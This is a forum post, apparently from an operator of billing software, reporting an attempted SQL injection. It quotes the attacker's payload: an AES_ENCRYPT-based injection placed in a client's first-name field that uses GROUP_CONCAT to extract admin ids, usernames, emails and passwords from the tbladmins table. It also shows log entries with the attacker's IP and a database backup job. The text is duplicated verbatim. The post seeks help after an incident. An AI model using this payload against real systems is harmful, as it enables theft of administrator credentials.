I had an attempted AES_ENCRYPT hack,
First Name: 'n403' to 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,pass word SEPARATOR 0x2c20) FROM tbladmins)'
Default Payment Method: '' to ''
I'm running the latest version, and all I read about this seems to indicate the problem had been patched awhile back.
However, in the logs i noted this
Created Client n403 fghjkhgfd - User ID: 18
- 02/05/2014 17:11 - System - 2.90.243.165
Cron Job: Starting Database Backup
- 02/05/2014 01:56 - System -
Cron Job: Completed
2.90.243.165 is his IP address,
if I am reading this correctly, he was able to trigger a database backup?
Was he able to obtain a copy?!?!
First Name: 'n403' to 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,pass word SEPARATOR 0x2c20) FROM tbladmins)'
Default Payment Method: '' to ''
I'm running the latest version, and all I read about this seems to indicate the problem had been patched awhile back.
However, in the logs i noted this
Created Client n403 fghjkhgfd - User ID: 18
- 02/05/2014 17:11 - System - 2.90.243.165
Cron Job: Starting Database Backup
- 02/05/2014 01:56 - System -
Cron Job: Completed
2.90.243.165 is his IP address,
if I am reading this correctly, he was able to trigger a database backup?
Was he able to obtain a copy?!?!